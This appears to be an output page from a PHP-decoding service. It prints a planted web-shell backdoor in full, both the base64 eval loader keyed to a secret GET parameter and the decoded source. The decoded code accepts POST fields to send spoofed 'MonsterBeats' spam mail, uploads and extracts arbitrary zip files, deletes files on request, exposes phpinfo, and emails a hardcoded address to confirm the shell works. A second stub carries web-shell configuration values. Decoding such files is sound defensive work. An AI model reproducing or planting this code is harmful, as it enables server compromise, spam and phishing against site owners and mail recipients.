Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php if(isset($_GET["t2479n"])){ eval(base64_decode("ZGVmaW5lKCJERUZDQUxMQkFDS01BS..

Decoded Output download

define("DEFCALLBACKMAIL", $_POST['from']);
$tomail = $_POST['to'];
$subj = $_POST['subject'];
$file = $_POST['att'];
$cmd = $_POST['cmd'];
$arch_file = $_POST['arch_file'];
$etest_mail = '[email protected]';


$dir = dirname(__FILE__)."/";

$html = file_get_contents($dir.$file);
$final_msg = preparehtmlmail($html,$dir);

if($cmd == 'mail'){
	print_r($arch_file); 
	if (@fopen($file, "r")) {
		if (mail($tomail, $subj, $final_msg['multipart'], $final_msg['headers'])) {
			echo "Ok";
			return true;
		}else{
			echo "MTA error!";
			return false;
		}
	}else{
		print_r($arch_file);
		echo "test";
		throw new Exception("Template exist!");
	}
}elseif ($cmd == 'unzip' && !empty($arch_file)){
	$zip = new ZipArchive;
	$res = $zip->open($arch_file);
	if ($res === TRUE) {
		$zip->extractTo('./');
		$zip->close();
		echo 'ok';
	} else {
		echo 'failed';
	}
}elseif($cmd == 'flUpl'){
	$uploaddir = realpath('./') . '/';
	$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
	echo '<pre>';
	if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
		$zip = new ZipArchive;
		$res = $zip->open($_FILES['userfile']['name']);
		echo "--------------".$_SERVER['SERVER_NAME']."--------------<br>";
		echo "File is valid, and was successfully uploaded.
";
		if ($res === TRUE) {
			$zip->extractTo('./');
			$zip->close();
			echo '<br>and Unpacked<br>';
		} else {
			echo $_FILES['userfile']['error'];
			echo '<br>unpack failed<br>';
		}
	} else {
		echo "Possible file upload attack!
";
	}
}else{
	echo "PHP Mail Socket v.: 0.92<br><br>";
	if (!extension_loaded('zip')) {
		echo '<small><FONT style="BACKGROUND-COLOR:#FF0000">ZIP module is exist!!! Upload you your template manualy.</FONT></small><br><br>';
	}else{
		echo '<small><FONT style="BACKGROUND-COLOR:#00FF00">ZIP module is loaded.</FONT></small><br><br>';
	}
}

if($_GET['cmd'] == 'unlink' && !empty($_GET['file'])){
	unlink($_GET['file']);
	echo "Removed: ".$_GET['file'];
}
if($_GET['cmd'] == 'phpinfo'){
	phpinfo();
}

if($_GET['cmd'] == 'etest'){
	$url = $_SERVER[HTTP_HOST].$_SERVER[REQUEST_URI];
	$url = explode('?', $url);
	$url = str_replace(".", " ", $url['0']);
	if(mail($etest_mail, 'Shell test check', '_'.$url.' - Ok')) {
		echo "<b>Ok<b>";
		return true;
	}else{
		echo "</b>MTA error!</b>";
		return false;
	}
}

function preparehtmlmail($html,$dir) {

	preg_match_all('~<img.*?src=.([\/.a-z0-9:_-]+).*?>~si',$html,$matches);
	$i = 0;
	$paths = array();
	foreach ($matches[1] as $img) {
		$img_old = $img;

		if(strpos($img, "http://") == false) {
			$uri = parse_url($img);
			$paths[$i]['path'] = $dir.$uri['path'];
			$content_id = md5($img);
			$html = str_replace($img_old,'cid:'.$content_id,$html);
			$paths[$i++]['cid'] = $content_id;
		}
	}

	$boundary = "--".md5(uniqid(time()));
	$headers = "MIME-Version: 1.0
";
	$headers .="Content-Type: multipart/mixed; boundary=\"$boundary\"
";

	$headers .= "Reply-To: MonsterBeats <".DEFCALLBACKMAIL.">
";
	$headers .= "Return-Path: MonsterBeats <".DEFCALLBACKMAIL.">
";
	$headers .= "Organization: MonsterBeats
";

	$headers .= "From: ".DEFCALLBACKMAIL."
";
	$multipart = '';
	$multipart .= "--$boundary
";
	$kod = 'utf-8';
	$multipart .= "Content-Type: text/html; charset=$kod
";
	$multipart .= "Content-Transfer-Encoding: Quot-Printed

";
	$multipart .= "$html

";

	foreach ($paths as $path) {
		if(file_exists($path['path']))
			$fp = fopen($path['path'],"r");
		if (!$fp)  {
			echo "File cannot be loaded";
			return false;
		}

		$imagetype = substr(strrchr($path['path'], '.' ),1);
		$file = fread($fp, filesize($path['path']));
		fclose($fp);

		$message_part = "";

		switch ($imagetype) {
			case 'png':
			case 'PNG':
				$message_part .= "Content-Type: image/png";
				break;
			case 'jpg':
			case 'jpeg':
			case 'JPG':
			case 'JPEG':
				$message_part .= "Content-Type: image/jpeg";
				break;
			case 'gif':
			case 'GIF':
				$message_part .= "Content-Type: image/gif";
				break;
		}
		$message_part .= "; file_name = ".$path['path']. "
";
		$message_part .= "Content-ID: <" . $path['cid'] . ">
";
		$message_part .= "Content-Transfer-Encoding: base64
";
		$message_part .= "Content-Disposition: inline; filename = \"" . basename($path['path']) . "\"

";
		$message_part .= chunk_split(base64_encode($file))."
";
		$multipart .= "--$boundary
".$message_part."
";

	}

	$multipart .= "--$boundary--
";
	return array('multipart' => $multipart, 'headers' => $headers);
}

Did this file decode correctly?

Original Code

<?php if(isset($_GET["t2479n"])){  						eval(base64_decode("ZGVmaW5lKCJERUZDQUxMQkFDS01BSUwiLCAkX1BPU1RbJ2Zyb20nXSk7CiR0b21haWwgPSAkX1BPU1RbJ3RvJ107CiRzdWJqID0gJF9QT1NUWydzdWJqZWN0J107CiRmaWxlID0gJF9QT1NUWydhdHQnXTsKJGNtZCA9ICRfUE9TVFsnY21kJ107CiRhcmNoX2ZpbGUgPSAkX1BPU1RbJ2FyY2hfZmlsZSddOwokZXRlc3RfbWFpbCA9ICdjb211YTlAZ21haWwuY29tJzsKCgokZGlyID0gZGlybmFtZShfX0ZJTEVfXykuIi8iOwoKJGh0bWwgPSBmaWxlX2dldF9jb250ZW50cygkZGlyLiRmaWxlKTsKJGZpbmFsX21zZyA9IHByZXBhcmVodG1sbWFpbCgkaHRtbCwkZGlyKTsKCmlmKCRjbWQgPT0gJ21haWwnKXsKCXByaW50X3IoJGFyY2hfZmlsZSk7IAoJaWYgKEBmb3BlbigkZmlsZSwgInIiKSkgewoJCWlmIChtYWlsKCR0b21haWwsICRzdWJqLCAkZmluYWxfbXNnWydtdWx0aXBhcnQnXSwgJGZpbmFsX21zZ1snaGVhZGVycyddKSkgewoJCQllY2hvICJPayI7CgkJCXJldHVybiB0cnVlOwoJCX1lbHNlewoJCQllY2hvICJNVEEgZXJyb3IhIjsKCQkJcmV0dXJuIGZhbHNlOwoJCX0KCX1lbHNlewoJCXByaW50X3IoJGFyY2hfZmlsZSk7CgkJZWNobyAidGVzdCI7CgkJdGhyb3cgbmV3IEV4Y2VwdGlvbigiVGVtcGxhdGUgZXhpc3QhIik7Cgl9Cn1lbHNlaWYgKCRjbWQgPT0gJ3VuemlwJyAmJiAhZW1wdHkoJGFyY2hfZmlsZSkpewoJJHppcCA9IG5ldyBaaXBBcmNoaXZlOwoJJHJlcyA9ICR6aXAtPm9wZW4oJGFyY2hfZmlsZSk7CglpZiAoJHJlcyA9PT0gVFJVRSkgewoJCSR6aXAtPmV4dHJhY3RUbygnLi8nKTsKCQkkemlwLT5jbG9zZSgpOwoJCWVjaG8gJ29rJzsKCX0gZWxzZSB7CgkJZWNobyAnZmFpbGVkJzsKCX0KfWVsc2VpZigkY21kID09ICdmbFVwbCcpewoJJHVwbG9hZGRpciA9IHJlYWxwYXRoKCcuLycpIC4gJy8nOwoJJHVwbG9hZGZpbGUgPSAkdXBsb2FkZGlyIC4gYmFzZW5hbWUoJF9GSUxFU1sndXNlcmZpbGUnXVsnbmFtZSddKTsKCWVjaG8gJzxwcmU+JzsKCWlmIChtb3ZlX3VwbG9hZGVkX2ZpbGUoJF9GSUxFU1sndXNlcmZpbGUnXVsndG1wX25hbWUnXSwgJHVwbG9hZGZpbGUpKSB7CgkJJHppcCA9IG5ldyBaaXBBcmNoaXZlOwoJCSRyZXMgPSAkemlwLT5vcGVuKCRfRklMRVNbJ3VzZXJmaWxlJ11bJ25hbWUnXSk7CgkJZWNobyAiLS0tLS0tLS0tLS0tLS0iLiRfU0VSVkVSWydTRVJWRVJfTkFNRSddLiItLS0tLS0tLS0tLS0tLTxicj4iOwoJCWVjaG8gIkZpbGUgaXMgdmFsaWQsIGFuZCB3YXMgc3VjY2Vzc2Z1bGx5IHVwbG9hZGVkLlxuIjsKCQlpZiAoJHJlcyA9PT0gVFJVRSkgewoJCQkkemlwLT5leHRyYWN0VG8oJy4vJyk7CgkJCSR6aXAtPmNsb3NlKCk7CgkJCWVjaG8gJzxicj5hbmQgVW5wYWNrZWQ8YnI+JzsKCQl9IGVsc2UgewoJCQllY2hvICRfRklMRVNbJ3VzZXJmaWxlJ11bJ2Vycm9yJ107CgkJCWVjaG8gJzxicj51bnBhY2sgZmFpbGVkPGJyPic7CgkJfQoJfSBlbHNlIHsKCQllY2hvICJQb3NzaWJsZSBmaWxlIHVwbG9hZCBhdHRhY2shXG4iOwoJfQp9ZWxzZXsKCWVjaG8gIlBIUCBNYWlsIFNvY2tldCB2LjogMC45Mjxicj48YnI+IjsKCWlmICghZXh0ZW5zaW9uX2xvYWRlZCgnemlwJykpIHsKCQllY2hvICc8c21hbGw+PEZPTlQgc3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6I0ZGMDAwMCI+WklQIG1vZHVsZSBpcyBleGlzdCEhISBVcGxvYWQgeW91IHlvdXIgdGVtcGxhdGUgbWFudWFseS48L0ZPTlQ+PC9zbWFsbD48YnI+PGJyPic7Cgl9ZWxzZXsKCQllY2hvICc8c21hbGw+PEZPTlQgc3R5bGU9IkJBQ0tHUk9VTkQtQ09MT1I6IzAwRkYwMCI+WklQIG1vZHVsZSBpcyBsb2FkZWQuPC9GT05UPjwvc21hbGw+PGJyPjxicj4nOwoJfQp9CgppZigkX0dFVFsnY21kJ10gPT0gJ3VubGluaycgJiYgIWVtcHR5KCRfR0VUWydmaWxlJ10pKXsKCXVubGluaygkX0dFVFsnZmlsZSddKTsKCWVjaG8gIlJlbW92ZWQ6ICIuJF9HRVRbJ2ZpbGUnXTsKfQppZigkX0dFVFsnY21kJ10gPT0gJ3BocGluZm8nKXsKCXBocGluZm8oKTsKfQoKaWYoJF9HRVRbJ2NtZCddID09ICdldGVzdCcpewoJJHVybCA9ICRfU0VSVkVSW0hUVFBfSE9TVF0uJF9TRVJWRVJbUkVRVUVTVF9VUkldOwoJJHVybCA9IGV4cGxvZGUoJz8nLCAkdXJsKTsKCSR1cmwgPSBzdHJfcmVwbGFjZSgiLiIsICIgIiwgJHVybFsnMCddKTsKCWlmKG1haWwoJGV0ZXN0X21haWwsICdTaGVsbCB0ZXN0IGNoZWNrJywgJ18nLiR1cmwuJyAtIE9rJykpIHsKCQllY2hvICI8Yj5PazxiPiI7CgkJcmV0dXJuIHRydWU7Cgl9ZWxzZXsKCQllY2hvICI8L2I+TVRBIGVycm9yITwvYj4iOwoJCXJldHVybiBmYWxzZTsKCX0KfQoKZnVuY3Rpb24gcHJlcGFyZWh0bWxtYWlsKCRodG1sLCRkaXIpIHsKCglwcmVnX21hdGNoX2FsbCgnfjxpbWcuKj9zcmM9LihbXC8uYS16MC05Ol8tXSspLio/Pn5zaScsJGh0bWwsJG1hdGNoZXMpOwoJJGkgPSAwOwoJJHBhdGhzID0gYXJyYXkoKTsKCWZvcmVhY2ggKCRtYXRjaGVzWzFdIGFzICRpbWcpIHsKCQkkaW1nX29sZCA9ICRpbWc7CgoJCWlmKHN0cnBvcygkaW1nLCAiaHR0cDovLyIpID09IGZhbHNlKSB7CgkJCSR1cmkgPSBwYXJzZV91cmwoJGltZyk7CgkJCSRwYXRoc1skaV1bJ3BhdGgnXSA9ICRkaXIuJHVyaVsncGF0aCddOwoJCQkkY29udGVudF9pZCA9IG1kNSgkaW1nKTsKCQkJJGh0bWwgPSBzdHJfcmVwbGFjZSgkaW1nX29sZCwnY2lkOicuJGNvbnRlbnRfaWQsJGh0bWwpOwoJCQkkcGF0aHNbJGkrK11bJ2NpZCddID0gJGNvbnRlbnRfaWQ7CgkJfQoJfQoKCSRib3VuZGFyeSA9ICItLSIubWQ1KHVuaXFpZCh0aW1lKCkpKTsKCSRoZWFkZXJzID0gIk1JTUUtVmVyc2lvbjogMS4wXG4iOwoJJGhlYWRlcnMgLj0iQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvbWl4ZWQ7IGJvdW5kYXJ5PVwiJGJvdW5kYXJ5XCJcbiI7CgoJJGhlYWRlcnMgLj0gIlJlcGx5LVRvOiBNb25zdGVyQmVhdHMgPCIuREVGQ0FMTEJBQ0tNQUlMLiI+XHJcbiI7CgkkaGVhZGVycyAuPSAiUmV0dXJuLVBhdGg6IE1vbnN0ZXJCZWF0cyA8Ii5ERUZDQUxMQkFDS01BSUwuIj5cclxuIjsKCSRoZWFkZXJzIC49ICJPcmdhbml6YXRpb246IE1vbnN0ZXJCZWF0c1xyXG4iOwoKCSRoZWFkZXJzIC49ICJGcm9tOiAiLkRFRkNBTExCQUNLTUFJTC4iXHJcbiI7CgkkbXVsdGlwYXJ0ID0gJyc7CgkkbXVsdGlwYXJ0IC49ICItLSRib3VuZGFyeVxuIjsKCSRrb2QgPSAndXRmLTgnOwoJJG11bHRpcGFydCAuPSAiQ29udGVudC1UeXBlOiB0ZXh0L2h0bWw7IGNoYXJzZXQ9JGtvZFxuIjsKCSRtdWx0aXBhcnQgLj0gIkNvbnRlbnQtVHJhbnNmZXItRW5jb2Rpbmc6IFF1b3QtUHJpbnRlZFxuXG4iOwoJJG11bHRpcGFydCAuPSAiJGh0bWxcblxuIjsKCglmb3JlYWNoICgkcGF0aHMgYXMgJHBhdGgpIHsKCQlpZihmaWxlX2V4aXN0cygkcGF0aFsncGF0aCddKSkKCQkJJGZwID0gZm9wZW4oJHBhdGhbJ3BhdGgnXSwiciIpOwoJCWlmICghJGZwKSAgewoJCQllY2hvICJGaWxlIGNhbm5vdCBiZSBsb2FkZWQiOwoJCQlyZXR1cm4gZmFsc2U7CgkJfQoKCQkkaW1hZ2V0eXBlID0gc3Vic3RyKHN0cnJjaHIoJHBhdGhbJ3BhdGgnXSwgJy4nICksMSk7CgkJJGZpbGUgPSBmcmVhZCgkZnAsIGZpbGVzaXplKCRwYXRoWydwYXRoJ10pKTsKCQlmY2xvc2UoJGZwKTsKCgkJJG1lc3NhZ2VfcGFydCA9ICIiOwoKCQlzd2l0Y2ggKCRpbWFnZXR5cGUpIHsKCQkJY2FzZSAncG5nJzoKCQkJY2FzZSAnUE5HJzoKCQkJCSRtZXNzYWdlX3BhcnQgLj0gIkNvbnRlbnQtVHlwZTogaW1hZ2UvcG5nIjsKCQkJCWJyZWFrOwoJCQljYXNlICdqcGcnOgoJCQljYXNlICdqcGVnJzoKCQkJY2FzZSAnSlBHJzoKCQkJY2FzZSAnSlBFRyc6CgkJCQkkbWVzc2FnZV9wYXJ0IC49ICJDb250ZW50LVR5cGU6IGltYWdlL2pwZWciOwoJCQkJYnJlYWs7CgkJCWNhc2UgJ2dpZic6CgkJCWNhc2UgJ0dJRic6CgkJCQkkbWVzc2FnZV9wYXJ0IC49ICJDb250ZW50LVR5cGU6IGltYWdlL2dpZiI7CgkJCQlicmVhazsKCQl9CgkJJG1lc3NhZ2VfcGFydCAuPSAiOyBmaWxlX25hbWUgPSAiLiRwYXRoWydwYXRoJ10uICJcbiI7CgkJJG1lc3NhZ2VfcGFydCAuPSAiQ29udGVudC1JRDogPCIgLiAkcGF0aFsnY2lkJ10gLiAiPlxuIjsKCQkkbWVzc2FnZV9wYXJ0IC49ICJDb250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiBiYXNlNjRcbiI7CgkJJG1lc3NhZ2VfcGFydCAuPSAiQ29udGVudC1EaXNwb3NpdGlvbjogaW5saW5lOyBmaWxlbmFtZSA9IFwiIiAuIGJhc2VuYW1lKCRwYXRoWydwYXRoJ10pIC4gIlwiXG5cbiI7CgkJJG1lc3NhZ2VfcGFydCAuPSBjaHVua19zcGxpdChiYXNlNjRfZW5jb2RlKCRmaWxlKSkuIlxuIjsKCQkkbXVsdGlwYXJ0IC49ICItLSRib3VuZGFyeVxuIi4kbWVzc2FnZV9wYXJ0LiJcbiI7CgoJfQoKCSRtdWx0aXBhcnQgLj0gIi0tJGJvdW5kYXJ5LS1cbiI7CglyZXR1cm4gYXJyYXkoJ211bHRpcGFydCcgPT4gJG11bHRpcGFydCwgJ2hlYWRlcnMnID0+ICRoZWFkZXJzKTsKfQ==")); 		 exit; } ?><?php if(isset($_GET["t6699n"])){  $auth_pass="";$color="#df5";$default_action="FilesMan";$default_use_ajax=true;$default_charset="Windows-1251"; exit; } ?> 

Function Calls

base64_decode 1

Variables

$color #df5
$auth_pass
$default_action FilesMan
$default_charset Windows-1251
$default_use_ajax True

Stats

MD5 2762c634b896bc4d53676a36fdddad02
Eval Count 1
Decode Time 133 ms